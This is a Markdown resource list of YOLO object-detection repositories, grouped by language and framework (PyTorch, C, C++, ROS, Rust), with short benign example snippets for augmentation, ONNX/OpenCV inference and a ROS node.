YOLO-NAS,v8,v7,v6,v5,R,X in under 20 lines of code. [www.augmentedstartups.com](https://www.augmentedstartups.com/) - [Oneflow-Inc/one-yolov5](https://github.com/Oneflow-Inc/one-yolov5) <img src="https://img.shields.io/github/stars/Oneflow-Inc/one-yolov5?style=social"/> : A more efficient yolov5 with oneflow backend 🎉🎉🎉. WeChat official account 「GiantPandaCV」: "[One-YOLOv5 released: a YOLOv5 that trains faster](https://mp.weixin.qq.com/s/tZ7swUd0biz7G3CiRkHHfw)" - [PaddleYOLO](https://github.com/PaddlePaddle/PaddleYOLO) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleYOLO?style=social"/> : 🚀🚀🚀 YOLO series of PaddlePaddle implementation, PP-YOLOE+, YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOX, YOLOv5u, YOLOv7u, RTMDet and so on. 🚀🚀🚀 - [BestYOLO](https://github.com/WangRongsheng/BestYOLO) <img src="https://img.shields.io/github/stars/WangRongsheng/BestYOLO?style=social"/> : 🌟Change the world, it will become a better place. | The best research- and competition-oriented YOLO practice framework! - [Cver4s](https://github.com/KangChou/Cver4s) <img src="https://img.shields.io/github/stars/KangChou/Cver4s?style=social"/> : Cver4s: Computer vision algorithm code base. - ### Learning Resources - [KuiperInfer (a self-built deep learning inference framework)](https://github.com/zjhellofss/KuiperInfer) <img src="https://img.shields.io/github/stars/zjhellofss/KuiperInfer?style=social"/> : Takes you from zero to a high-performance deep learning inference library, supporting inference for llama, Unet, Yolov5, Resnet and other models. Implement a high-performance deep learning inference library step by step. 
- [kuiperdatawhale](https://github.com/zjhellofss/kuiperdatawhale) <img src="https://img.shields.io/github/stars/zjhellofss/kuiperdatawhale?style=social"/> : Build a deep learning inference framework from scratch. - [roboflow/notebooks](https://github.com/roboflow/notebooks) <img src="https://img.shields.io/github/stars/roboflow/notebooks?style=social"/> : Examples and tutorials on using SOTA computer vision models and techniques. Learn everything from old-school ResNet, through YOLO and object-detection transformers like DETR, to the latest models like Grounding DINO and SAM. [roboflow.com/models](https://roboflow.com/models) - [yjh0410/PyTorch_YOLO_Tutorial](https://github.com/yjh0410/PyTorch_YOLO_Tutorial) <img src="https://img.shields.io/github/stars/yjh0410/PyTorch_YOLO_Tutorial?style=social"/> : YOLO Tutorial. - [HuKai97/yolov5-5.x-annotations](https://github.com/HuKai97/yolov5-5.x-annotations) <img src="https://img.shields.io/github/stars/HuKai97/yolov5-5.x-annotations?style=social"/> : A Chinese-annotated version based on yolov5-5.0! - [crkk-feng/yolov5-annotations](https://github.com/crkk-feng/yolov5-annotations) <img src="https://img.shields.io/github/stars/crkk-feng/yolov5-annotations?style=social"/> : A Chinese annotated version of yolov5-5.0. - [XiaoJiNu/yolov5-v6-chinese-comment](https://github.com/XiaoJiNu/yolov5-v6-chinese-comment) <img src="https://img.shields.io/github/stars/XiaoJiNu/yolov5-v6-chinese-comment?style=social"/> : Annotations for yolov5 v6. - [1131624548/About-YOLOv5-7-0](https://github.com/1131624548/About-YOLOv5-7-0) <img src="https://img.shields.io/github/stars/XiaoJiNu/yolov5-v6-chinese-comment?style=social"/> : YOLOv5 code annotations. - [zyds/yolov5-code](https://github.com/zyds/yolov5-code) <img src="https://img.shields.io/github/stars/zyds/yolov5-code?style=social"/> : A hands-on, step-by-step guide to YOLOv5. ## Extensional Frameworks - [EasyCV](https://github.com/alibaba/EasyCV) <img src="https://img.shields.io/github/stars/alibaba/EasyCV?style=social"/> : An all-in-one toolkit for computer vision. "YOLOX-PAI: An Improved YOLOX, Stronger and Faster than YOLOv6". (**[arXiv 2022](https://arxiv.org/abs/2208.13040)**). WeChat official account 「集智书童」: "[YOLOX upgraded | Alibaba proposes YOLOX-PAI: unbeatable accuracy within 1 ms, surpassing YOLOv6 and PP-YOLOE](https://mp.weixin.qq.com/s/bIu3cYyZ-fVb5iB0bTfyug)" - [YOLACT & YOLACT++](https://github.com/dbolya/yolact) <img src="https://img.shields.io/github/stars/dbolya/yolact?style=social"/> : You Only Look At CoefficienTs. (**[ICCV 2019](https://openaccess.thecvf.com/content_ICCV_2019/html/Bolya_YOLACT_Real-Time_Instance_Segmentation_ICCV_2019_paper.html), [IEEE TPAMI 2020](https://ieeexplore.ieee.org/abstract/document/9159935)**) - [Alpha-IoU](https://github.com/Jacobi93/Alpha-IoU) <img src="https://img.shields.io/github/stars/Jacobi93/Alpha-IoU?style=social"/> : "Alpha-IoU: A Family of Power Intersection over Union Losses for Bounding Box Regression". (**[NeurIPS 2021](https://proceedings.neurips.cc//paper/2021/hash/a8f15eda80c50adb0e71943adc8015cf-Abstract.html)**) - [CIoU](https://github.com/Zzh-tju/CIoU) <img src="https://img.shields.io/github/stars/Zzh-tju/CIoU?style=social"/> : Complete-IoU (CIoU) Loss and Cluster-NMS for Object Detection and Instance Segmentation (YOLACT). 
- [Albumentations](https://github.com/albumentations-team/albumentations) <img src="https://img.shields.io/github/stars/albumentations-team/albumentations?style=social"/> : Albumentations is a Python library for image augmentation. Image augmentation is used in deep learning and computer vision tasks to increase the quality of trained models. The purpose of image augmentation is to create new training samples from the existing data. "Albumentations: Fast and Flexible Image Augmentations". (**[Information 2020](https://www.mdpi.com/2078-2489/11/2/125)**)
- [doubleZ0108/Data-Augmentation](https://github.com/doubleZ0108/Data-Augmentation) <img src="https://img.shields.io/github/stars/doubleZ0108/Data-Augmentation?style=social"/> : General data augmentation algorithms for object detection (esp. YOLO).
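For detection work, the point of Albumentations is that the bounding boxes are transformed together with the image. A minimal sketch of that pattern, assuming YOLO-format labels; the file name and box values are illustrative only:

```python
import albumentations as A
import cv2

# Pipeline that keeps bounding boxes in sync with the image.
# format="yolo" expects normalized [x_center, y_center, width, height] boxes.
transform = A.Compose(
    [
        A.HorizontalFlip(p=0.5),
        A.RandomBrightnessContrast(p=0.2),
        A.ShiftScaleRotate(shift_limit=0.05, scale_limit=0.1, rotate_limit=10, p=0.5),
    ],
    bbox_params=A.BboxParams(format="yolo", label_fields=["class_labels"]),
)

image = cv2.imread("sample.jpg")  # hypothetical input image
bboxes = [[0.5, 0.5, 0.2, 0.3]]   # one YOLO-format box (illustrative values)
class_labels = [0]

out = transform(image=image, bboxes=bboxes, class_labels=class_labels)
augmented_image, augmented_bboxes = out["image"], out["bboxes"]
```

Boxes that are flipped, shifted or scaled out of the frame are clipped or dropped by the library, so the augmented labels stay valid without extra bookkeeping.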
## Other Versions of YOLO

- ### PyTorch Implementation

  - [ultralytics/yolov3](https://github.com/ultralytics/yolov3) <img src="https://img.shields.io/github/stars/ultralytics/yolov3?style=social"/> : YOLOv3 in PyTorch > ONNX > CoreML > TFLite.
  - [eriklindernoren/PyTorch-YOLOv3](https://github.com/eriklindernoren/PyTorch-YOLOv3) <img src="https://img.shields.io/github/stars/eriklindernoren/PyTorch-YOLOv3?style=social"/> : Minimal PyTorch implementation of YOLOv3.
  - [Tianxiaomo/pytorch-YOLOv4](https://github.com/Tianxiaomo/pytorch-YOLOv4) <img src="https://img.shields.io/github/stars/Tianxiaomo/pytorch-YOLOv4?style=social"/> : PyTorch, ONNX and TensorRT implementation of YOLOv4.
  - [ayooshkathuria/pytorch-yolo-v3](https://github.com/ayooshkathuria/pytorch-yolo-v3) <img src="https://img.shields.io/github/stars/ayooshkathuria/pytorch-yolo-v3?style=social"/> : A PyTorch implementation of the YOLO v3 object detection algorithm.
  - [WongKinYiu/PyTorch_YOLOv4](https://github.com/WongKinYiu/PyTorch_YOLOv4) <img src="https://img.shields.io/github/stars/WongKinYiu/PyTorch_YOLOv4?style=social"/> : PyTorch implementation of YOLOv4.
  - [argusswift/YOLOv4-pytorch](https://github.com/argusswift/YOLOv4-pytorch) <img src="https://img.shields.io/github/stars/argusswift/YOLOv4-pytorch?style=social"/> : This is a pytorch repository of YOLOv4, attentive YOLOv4 and mobilenet YOLOv4 with PASCAL VOC and COCO.
  - [longcw/yolo2-pytorch](https://github.com/longcw/yolo2-pytorch) <img src="https://img.shields.io/github/stars/longcw/yolo2-pytorch?style=social"/> : YOLOv2 in PyTorch.
  - [bubbliiiing/yolov5-v6.1-pytorch](https://github.com/bubbliiiing/yolov5-v6.1-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov5-v6.1-pytorch?style=social"/> : The source code of yolov5-v6.1-pytorch; it can be used to train your own model.
  - [bubbliiiing/yolov5-pytorch](https://github.com/bubbliiiing/yolov5-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov5-pytorch?style=social"/> : The source code of YoloV5-pytorch; it can be used to train your own model.
  - [bubbliiiing/yolov4-pytorch](https://github.com/bubbliiiing/yolov4-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-pytorch?style=social"/> : The source code of YoloV4-pytorch; it can be used to train your own model.
  - [bubbliiiing/yolov4-tiny-pytorch](https://github.com/bubbliiiing/yolov4-tiny-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-tiny-pytorch?style=social"/> : The source code of YoloV4-tiny-pytorch; it can be used to train your own model.
  - [bubbliiiing/yolov3-pytorch](https://github.com/bubbliiiing/yolo3-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolo3-pytorch?style=social"/> : The source code of yolo3-pytorch; it can be used to train your own model.
  - [bubbliiiing/yolox-pytorch](https://github.com/bubbliiiing/yolox-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolox-pytorch?style=social"/> : The source code of yolox-pytorch; it can be used to train your own model.
  - [bubbliiiing/yolov7-pytorch](https://github.com/bubbliiiing/yolov7-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov7-pytorch?style=social"/> : A yolov7 library; it can be used to train on your own dataset.
  - [bubbliiiing/yolov8-pytorch](https://github.com/bubbliiiing/yolov8-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov8-pytorch?style=social"/> : A yolov8-pytorch repository; it can be used to train on your own dataset.
  - [BobLiu20/YOLOv3_PyTorch](https://github.com/BobLiu20/YOLOv3_PyTorch) <img src="https://img.shields.io/github/stars/BobLiu20/YOLOv3_PyTorch?style=social"/> : Full implementation of YOLOv3 in PyTorch.
  - [ruiminshen/yolo2-pytorch](https://github.com/ruiminshen/yolo2-pytorch) <img src="https://img.shields.io/github/stars/ruiminshen/yolo2-pytorch?style=social"/> : PyTorch implementation of the YOLO (You Only Look Once) v2.
  - [DeNA/PyTorch_YOLOv3](https://github.com/DeNA/PyTorch_YOLOv3) <img src="https://img.shields.io/github/stars/DeNA/PyTorch_YOLOv3?style=social"/> : Implementation of YOLOv3 in PyTorch.
  - [abeardear/pytorch-YOLO-v1](https://github.com/abeardear/pytorch-YOLO-v1) <img src="https://img.shields.io/github/stars/abeardear/pytorch-YOLO-v1?style=social"/> : An experiment for yolo-v1, including training and testing.
  - [wuzhihao7788/yolodet-pytorch](https://github.com/wuzhihao7788/yolodet-pytorch) <img src="https://img.shields.io/github/stars/wuzhihao7788/yolodet-pytorch?style=social"/> : Reproduce the YOLO series of papers in pytorch, including YOLOv4, PP-YOLO, YOLOv5, YOLOv3, etc.
  - [uvipen/Yolo-v2-pytorch](https://github.com/uvipen/Yolo-v2-pytorch) <img src="https://img.shields.io/github/stars/uvipen/Yolo-v2-pytorch?style=social"/> : YOLO for object detection tasks.
  - [Peterisfar/YOLOV3](https://github.com/Peterisfar/YOLOV3) <img src="https://img.shields.io/github/stars/Peterisfar/YOLOV3?style=social"/> : YOLOv3 in pytorch.
  - [misads/easy_detection](https://github.com/misads/easy_detection) <img src="https://img.shields.io/github/stars/misads/easy_detection?style=social"/> : A simple and convenient object detection framework (runs directly in a PyTorch environment, no CUDA compilation needed), supporting classic networks such as Faster_RCNN, the Yolo series (v2~v5), EfficientDet, RetinaNet and Cascade-RCNN.
  - [miemiedetection](https://github.com/miemie2013/miemiedetection) <img src="https://img.shields.io/github/stars/miemie2013/miemiedetection?style=social"/> : Pytorch and ncnn implementation of PPYOLOE, YOLOX, PPYOLO, PPYOLOv2, SOLOv2 and so on.
  - [pjh5672/YOLOv1](https://github.com/pjh5672/YOLOv1) <img src="https://img.shields.io/github/stars/pjh5672/YOLOv1?style=social"/> : YOLOv1 implementation using PyTorch.
  - [pjh5672/YOLOv2](https://github.com/pjh5672/YOLOv2) <img src="https://img.shields.io/github/stars/pjh5672/YOLOv2?style=social"/> : YOLOv2 implementation using PyTorch.
  - [pjh5672/YOLOv3](https://github.com/pjh5672/YOLOv3) <img src="https://img.shields.io/github/stars/pjh5672/YOLOv3?style=social"/> : YOLOv3 implementation using PyTorch.
  - [Iywie/pl_YOLO](https://github.com/Iywie/pl_YOLO) <img src="https://img.shields.io/github/stars/Iywie/pl_YOLO?style=social"/> : YOLOv7, YOLOX and YOLOv5 are working right now.
  - [DavidLandup0/deepvision](https://github.com/DavidLandup0/deepvision) <img src="https://img.shields.io/github/stars/DavidLandup0/deepvision?style=social"/> : PyTorch and TensorFlow/Keras image models with automatic weight conversions and equal API/implementations - Vision Transformer (ViT), ResNetV2, EfficientNetV2, (planned...) DeepLabV3+, ConvNeXtV2, YOLO, NeRF, etc.
  - [theos-ai/easy-yolov7](https://github.com/theos-ai/easy-yolov7) <img src="https://img.shields.io/github/stars/theos-ai/easy-yolov7?style=social"/> : This is a clean and easy-to-use implementation of YOLOv7 in PyTorch, made with โค๏ธ by Theos AI.
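Many of the PyTorch ports above follow the upstream Ultralytics workflow, so a single reference point is useful. A minimal inference sketch using the documented `torch.hub` entry point of ultralytics/yolov5 (the image path is illustrative):

```python
import torch

# Load a pretrained YOLOv5s model via the Ultralytics hub entry point
# (weights are downloaded on first use).
model = torch.hub.load("ultralytics/yolov5", "yolov5s", pretrained=True)

# Inference accepts file paths, URLs, PIL images or numpy arrays.
results = model("zidane.jpg")  # illustrative input

results.print()               # summary to stdout
detections = results.xyxy[0]  # tensor rows: (x1, y1, x2, y2, confidence, class)
print(detections)
```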
- ### C Implementation

  - [ggml](https://github.com/ggerganov/ggml) <img src="https://img.shields.io/github/stars/ggerganov/ggml?style=social"/> : Tensor library for machine learning. Written in C.
  - [rockcarry/ffcnn](https://github.com/rockcarry/ffcnn) <img src="https://img.shields.io/github/stars/rockcarry/ffcnn?style=social"/> : ffcnn is a CNN inference framework written in 600 lines of C.
  - [ar7775/Object-Detection-System-Yolo](https://github.com/ar7775/Object-Detection-System-Yolo) <img src="https://img.shields.io/github/stars/ar7775/Object-Detection-System-Yolo?style=social"/> : Object Detection System.
  - [lstuma/YOLO_utils](https://github.com/lstuma/YOLO_utils) <img src="https://img.shields.io/github/stars/lstuma/YOLO_utils?style=social"/> : A few utilities for the YOLO project implemented in C for extra speed.
  - [RajneeshKumar12/yolo-detection-app](https://github.com/RajneeshKumar12/yolo-detection-app) <img src="https://img.shields.io/github/stars/RajneeshKumar12/yolo-detection-app?style=social"/> : Yolo app for object detection.
  - [Deyht/CIANNA](https://github.com/Deyht/CIANNA) <img src="https://img.shields.io/github/stars/Deyht/CIANNA?style=social"/> : CIANNA - Convolutional Interactive Artificial Neural Networks by/for Astrophysicists.

- ### CPP Implementation

  - [walktree/libtorch-yolov3](https://github.com/walktree/libtorch-yolov3) <img src="https://img.shields.io/github/stars/walktree/libtorch-yolov3?style=social"/> : A Libtorch implementation of the YOLO v3 object detection algorithm, written with pure C++.
  - [yasenh/libtorch-yolov5](https://github.com/yasenh/libtorch-yolov5) <img src="https://img.shields.io/github/stars/yasenh/libtorch-yolov5?style=social"/> : A LibTorch inference implementation of yolov5.
  - [Nebula4869/YOLOv5-LibTorch](https://github.com/Nebula4869/YOLOv5-LibTorch) <img src="https://img.shields.io/github/stars/Nebula4869/YOLOv5-LibTorch?style=social"/> : Real time object detection with deployment of YOLOv5 through LibTorch C++ API.
  - [ncdhz/YoloV5-LibTorch](https://github.com/ncdhz/YoloV5-LibTorch) <img src="https://img.shields.io/github/stars/ncdhz/YoloV5-LibTorch?style=social"/> : A C++ wrapper library for YoloV5.
  - [Rane2021/yolov5_train_cpp_inference](https://github.com/Rane2021/yolov5_train_cpp_inference) <img src="https://img.shields.io/github/stars/Rane2021/yolov5_train_cpp_inference?style=social"/> : YOLOv5 training and C++ inference code, with excellent results.
  - [stephanecharette/DarkHelp](https://github.com/stephanecharette/DarkHelp) <img src="https://img.shields.io/github/stars/stephanecharette/DarkHelp?style=social"/> : The DarkHelp C++ API is a wrapper to make it easier to use the Darknet neural network framework within a C++ application.
  - [UNeedCryDear/yolov5-opencv-dnn-cpp](https://github.com/UNeedCryDear/yolov5-opencv-dnn-cpp) <img src="https://img.shields.io/github/stars/UNeedCryDear/yolov5-opencv-dnn-cpp?style=social"/> : Deploy yolov5 v6.0 with the OpenCV DNN module.
  - [UNeedCryDear/yolov5-seg-opencv-onnxruntime-cpp](https://github.com/UNeedCryDear/yolov5-seg-opencv-onnxruntime-cpp) <img src="https://img.shields.io/github/stars/UNeedCryDear/yolov5-seg-opencv-onnxruntime-cpp?style=social"/> : yolov5 segmentation with onnxruntime and opencv.
  - [hpc203/yolov5-dnn-cpp-python](https://github.com/hpc203/yolov5-dnn-cpp-python) <img src="https://img.shields.io/github/stars/hpc203/yolov5-dnn-cpp-python?style=social"/> : YOLOv5 object detection with OpenCV's DNN module, in both C++ and Python versions.
  - [hpc203/yolox-opencv-dnn](https://github.com/hpc203/yolox-opencv-dnn) <img src="https://img.shields.io/github/stars/hpc203/yolox-opencv-dnn?style=social"/> : Deploy YOLOX with OpenCV, supporting the YOLOX-S, YOLOX-M, YOLOX-L, YOLOX-X and YOLOX-Darknet53 structures, in both C++ and Python versions.
  - [hpc203/yolov7-opencv-onnxrun-cpp-py](https://github.com/hpc203/yolov7-opencv-onnxrun-cpp-py) <img src="https://img.shields.io/github/stars/hpc203/yolov7-opencv-onnxrun-cpp-py?style=social"/> : Deploy YOLOV7 object detection with OpenCV and ONNXRuntime respectively, 12 ONNX models in total, again in both C++ and Python versions.
  - [doleron/yolov5-opencv-cpp-python](https://github.com/doleron/yolov5-opencv-cpp-python) <img src="https://img.shields.io/github/stars/doleron/yolov5-opencv-cpp-python?style=social"/> : Example of using ultralytics YOLO V5 with OpenCV 4.5.4, C++ and Python.
  - [UNeedCryDear/yolov8-opencv-onnxruntime-cpp](https://github.com/UNeedCryDear/yolov8-opencv-onnxruntime-cpp) <img src="https://img.shields.io/github/stars/UNeedCryDear/yolov8-opencv-onnxruntime-cpp?style=social"/> : Detection and instance segmentation of yolov8 using onnxruntime and opencv.
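Several of the deployments above (and their Python twins) share the same OpenCV DNN recipe. A minimal Python sketch of that recipe, assuming a YOLOv5 model already exported to `yolov5s.onnx` with a 640×640 input; for brevity, box coordinates are left in network space rather than rescaled to the original image:

```python
import cv2

net = cv2.dnn.readNetFromONNX("yolov5s.onnx")  # assumed exported model

image = cv2.imread("sample.jpg")               # illustrative input
blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (640, 640), swapRB=True, crop=False)
net.setInput(blob)

# YOLOv5 ONNX output: (1, 25200, 85) = boxes x (cx, cy, w, h, obj, 80 class scores)
predictions = net.forward()[0]

# Keep rows with sufficient objectness, then let OpenCV run NMS.
boxes, scores = [], []
for row in predictions:
    if row[4] < 0.25:
        continue
    cx, cy, w, h = row[:4]
    boxes.append([int(cx - w / 2), int(cy - h / 2), int(w), int(h)])
    scores.append(float(row[4] * row[5:].max()))

keep = cv2.dnn.NMSBoxes(boxes, scores, 0.25, 0.45)
print(f"{len(keep)} detections after NMS")
```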
- ### ROS Implementation

  - [mgonzs13/yolov8_ros](https://github.com/mgonzs13/yolov8_ros) <img src="https://img.shields.io/github/stars/mgonzs13/yolov8_ros?style=social"/> : Ultralytics YOLOv8 and YOLOv9 object detections for ROS 2.
  - [leggedrobotics/darknet_ros](https://github.com/leggedrobotics/darknet_ros) <img src="https://img.shields.io/github/stars/leggedrobotics/darknet_ros?style=social"/> : Real-Time Object Detection for ROS.
  - [engcang/ros-yolo-sort](https://github.com/engcang/ros-yolo-sort) <img src="https://img.shields.io/github/stars/engcang/ros-yolo-sort?style=social"/> : YOLO and SORT, and ROS versions of them.
  - [chrisgundling/YoloLight](https://github.com/chrisgundling/YoloLight) <img src="https://img.shields.io/github/stars/chrisgundling/YoloLight?style=social"/> : Tiny-YOLO-v2 ROS Node for Traffic Light Detection.
  - [Ar-Ray-code/YOLOX-ROS](https://github.com/Ar-Ray-code/YOLOX-ROS) <img src="https://img.shields.io/github/stars/Ar-Ray-code/YOLOX-ROS?style=social"/> : YOLOX + ROS2 object detection package.
  - [Ar-Ray-code/YOLOv5-ROS](https://github.com/Ar-Ray-code/YOLOv5-ROS) <img src="https://img.shields.io/github/stars/Ar-Ray-code/YOLOv5-ROS?style=social"/> : YOLOv5 + ROS2 object detection package.
  - [Tossy0423/yolov4-for-darknet_ros](https://github.com/Tossy0423/yolov4-for-darknet_ros) <img src="https://img.shields.io/github/stars/Tossy0423/yolov4-for-darknet_ros?style=social"/> : This is the environment in which YOLO V4 is ported to darknet_ros.
  - [qianmin/yolov5_ROS](https://github.com/qianmin/yolov5_ROS) <img src="https://img.shields.io/github/stars/qianmin/yolov5_ROS?style=social"/> : Run YOLOv5 in ROS.
  - [ailllist/yolov5_ROS](https://github.com/ailllist/yolov5_ROS) <img src="https://img.shields.io/github/stars/ailllist/yolov5_ROS?style=social"/> : yolov5 for ros, not webcam.
  - [Shua-Kang/ros_pytorch_yolov5](https://github.com/Shua-Kang/ros_pytorch_yolov5) <img src="https://img.shields.io/github/stars/Shua-Kang/ros_pytorch_yolov5?style=social"/> : A ROS wrapper for yolov5. (master branch is v5.0 of yolov5; for v6.1, see branch v6.1).
  - [ziyan0302/Yolov5_DeepSort_Pytorch_ros](https://github.com/ziyan0302/Yolov5_DeepSort_Pytorch_ros) <img src="https://img.shields.io/github/stars/ziyan0302/Yolov5_DeepSort_Pytorch_ros?style=social"/> : Connect Yolov5 detection module and DeepSort tracking module via ROS.
  - [U07157135/ROS2-with-YOLOv5](https://github.com/U07157135/ROS2-with-YOLOv5) <img src="https://img.shields.io/github/stars/U07157135/ROS2-with-YOLOv5?style=social"/> : YOLOv5 object detection on a drone with ROS2.
  - [lukazso/yolov6-ros](https://github.com/lukazso/yolov6-ros) <img src="https://img.shields.io/github/stars/lukazso/yolov6-ros?style=social"/> : ROS package for YOLOv6.
  - [qq44642754a/Yolov5_ros](https://github.com/qq44642754a/Yolov5_ros) <img src="https://img.shields.io/github/stars/qq44642754a/Yolov5_ros?style=social"/> : Real-time object detection with ROS, based on YOLOv5 and PyTorch.
  - [lukazso/yolov7-ros](https://github.com/lukazso/yolov7-ros) <img src="https://img.shields.io/github/stars/lukazso/yolov7-ros?style=social"/> : ROS package for official YOLOv7.
  - [phuoc101/yolov7_ros](https://github.com/phuoc101/yolov7_ros) <img src="https://img.shields.io/github/stars/phuoc101/yolov7_ros?style=social"/> : ROS package for official YOLOv7.
  - [ConfusionTechnologies/ros-yolov5-node](https://github.com/ConfusionTechnologies/ros-yolov5-node) <img src="https://img.shields.io/github/stars/ConfusionTechnologies/ros-yolov5-node?style=social"/> : For ROS2; uses the ONNX GPU Runtime to run YOLOv5 inference.
  - [Ar-Ray-code/darknet_ros_fp16](https://github.com/Ar-Ray-code/darknet_ros_fp16) <img src="https://img.shields.io/github/stars/Ar-Ray-code/darknet_ros_fp16?style=social"/> : darknet + ROS2 Humble + OpenCV4 + CUDA 11 (cuDNN, Jetson Orin).
  - [wk123467/yolov5s_trt_ros](https://github.com/wk123467/yolov5s_trt_ros) <img src="https://img.shields.io/github/stars/wk123467/yolov5s_trt_ros?style=social"/> : Accelerate yolov5s with TensorRT and apply it in ROS to detect traffic scenes: traffic signs, traffic lights (directly outputting the light state), pedestrians and vehicles.
  - [PardisTaghavi/yolov7_strongsort_ros](https://github.com/PardisTaghavi/yolov7_strongsort_ros) <img src="https://img.shields.io/github/stars/PardisTaghavi/yolov7_strongsort_ros?style=social"/> : Integration of "Yolov7 StrongSort" with ROS for real time object tracking.
  - [af-doom/yolov8_ros_tensorrt-](https://github.com/af-doom/yolov8_ros_tensorrt-) <img src="https://img.shields.io/github/stars/af-doom/yolov8_ros_tensorrt-?style=social"/> : A YOLOv8 project based on a ROS implementation, where YOLOv8 uses TensorRT acceleration.
  - [KoKoMier/ros_darknet_yolov4](https://github.com/KoKoMier/ros_darknet_yolov4) <img src="https://img.shields.io/github/stars/KoKoMier/ros_darknet_yolov4?style=social"/> : A robotics-team program combining vision and radar: objects are first detected with YOLO, then the detections are sent to a ROS program for fusion with radar data.
  - [YellowAndGreen/Yolov5-OpenCV-Cpp-Python-ROS](https://github.com/YellowAndGreen/Yolov5-OpenCV-Cpp-Python-ROS) <img src="https://img.shields.io/github/stars/YellowAndGreen/Yolov5-OpenCV-Cpp-Python-ROS?style=social"/> : Inference with YOLOv5, OpenCV 4.5.4 DNN, C++, ROS and Python.
  - [fishros/yolov5_ros2](https://github.com/fishros/yolov5_ros2) <img src="https://img.shields.io/github/stars/fishros/yolov5_ros2?style=social"/> : A YOLOv5-based ROS2 package for quick object recognition and pose publishing.
  - [fateshelled/EdgeYOLO-ROS](https://github.com/fateshelled/EdgeYOLO-ROS) <img src="https://img.shields.io/github/stars/fateshelled/EdgeYOLO-ROS?style=social"/> : EdgeYOLO + ROS2 object detection package.
  - [vivaldini/yolov6-uav](https://github.com/vivaldini/yolov6-uav) <img src="https://img.shields.io/github/stars/vivaldini/yolov6-uav?style=social"/> : This repository contains a ROS Noetic package for YOLOv6 to recognize objects from a UAV and provide their positions.
  - [Alpaca-zip/ultralytics_ros](https://github.com/Alpaca-zip/ultralytics_ros) <img src="https://img.shields.io/github/stars/Alpaca-zip/ultralytics_ros?style=social"/> : ROS/ROS2 package for Ultralytics YOLOv8 real-time object detection.
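The ROS wrappers above mostly share the same shape: subscribe to an image topic, run the detector in the callback, publish the results. A minimal rospy sketch of that pattern under assumed names (`/camera/image_raw` topic, YOLOv5 via `torch.hub`, a plain string result topic), not any listed package's actual API:

```python
import rospy
import torch
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from std_msgs.msg import String

bridge = CvBridge()
model = torch.hub.load("ultralytics/yolov5", "yolov5s", pretrained=True)
pub = rospy.Publisher("/detections", String, queue_size=1)

def on_image(msg):
    # Convert the ROS image to an OpenCV BGR array and run the detector.
    frame = bridge.imgmsg_to_cv2(msg, desired_encoding="bgr8")
    results = model(frame)
    # Publish a human-readable summary; real packages publish typed
    # detection messages (e.g. vision_msgs) instead of strings.
    pub.publish(String(data=str(results.pandas().xyxy[0].to_dict("records"))))

if __name__ == "__main__":
    rospy.init_node("yolo_node")
    rospy.Subscriber("/camera/image_raw", Image, on_image, queue_size=1)
    rospy.spin()
```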
- ### Mojo Implementation

  - [taalhaataahir0102/Mojo-Yolo](https://github.com/taalhaataahir0102/Mojo-Yolo) <img src="https://img.shields.io/github/stars/taalhaataahir0102/Mojo-Yolo?style=social"/> : Mojo-Yolo.

- ### Rust Implementation

  - [Candle](https://github.com/huggingface/candle) <img src="https://img.shields.io/github/stars/huggingface/candle?style=social"/> : Minimalist ML framework for Rust.
  - [Tokenizers](https://github.com/huggingface/tokenizers) <img src="https://img.shields.io/github/stars/huggingface/tokenizers?style=social"/> : ๐Ÿ’ฅ Fast State-of-the-Art Tokenizers optimized for Research and Production. [huggingface.co/docs/tokenizers](https://huggingface.co/docs/tokenizers/index)
  - [Safetensors](https://github.com/huggingface/safetensors) <img src="https://img.shields.io/github/stars/huggingface/safetensors?style=social"/> : Simple, safe way to store and distribute tensors. [huggingface.co/docs/safetensors](https://huggingface.co/docs/safetensors/index)
  - [Burn](https://github.com/burn-rs/burn) <img src="https://img.shields.io/github/stars/burn-rs/burn?style=social"/> : Burn - A Flexible and Comprehensive Deep Learning Framework in Rust. [burn-rs.github.io/](https://burn-rs.github.io/)
  - [TensorFlow Rust](https://github.com/tensorflow/rust) <img src="https://img.shields.io/github/stars/tensorflow/rust?style=social"/> : Rust language bindings for TensorFlow.
  - [tch-rs](https://github.com/LaurentMazare/tch-rs) <img src="https://img.shields.io/github/stars/LaurentMazare/tch-rs?style=social"/> : Rust bindings for the C++ API of PyTorch.
  - [dfdx](https://github.com/coreylowman/dfdx) <img src="https://img.shields.io/github/stars/coreylowman/dfdx?style=social"/> : Deep learning in Rust, with shape checked tensors and neural networks.
  - [tract](https://github.com/sonos/tract) <img src="https://img.shields.io/github/stars/sonos/tract?style=social"/> : Sonos' Neural Network inference engine. Tiny, no-nonsense, self-contained, TensorFlow and ONNX inference.
  - [ort](https://github.com/pykeio/ort) <img src="https://img.shields.io/github/stars/pykeio/ort?style=social"/> : A Rust wrapper for ONNX Runtime. [docs.rs/ort](https://docs.rs/ort/latest/ort/)
  - [codingonion/yolov5-gui-slint](https://github.com/codingonion/yolov5-gui-slint) <img src="https://img.shields.io/github/stars/codingonion/yolov5-gui-slint?style=social"/> : YOLOv5 GUI inference framework built with Slint.
  - [ptaxom/pnn](https://github.com/ptaxom/pnn) <img src="https://img.shields.io/github/stars/ptaxom/pnn?style=social"/> : pnn is a [Darknet](https://github.com/alexeyAB/darknet)-compatible neural-network inference engine implemented in Rust, with a significant performance increase achieved through optimization (especially in FP16 mode). pnn provides cuDNN-based and TensorRT-based inference engines.
  - [bencevans/rust-opencv-yolov5](https://github.com/bencevans/rust-opencv-yolov5) <img src="https://img.shields.io/github/stars/bencevans/rust-opencv-yolov5?style=social"/> : YOLOv5 Inference with ONNX & OpenCV in Rust.
  - [masc-it/yolov5-api-rust](https://github.com/masc-it/yolov5-api-rust) <img src="https://img.shields.io/github/stars/masc-it/yolov5-api-rust?style=social"/> : Rust API to run predictions with YoloV5 models.
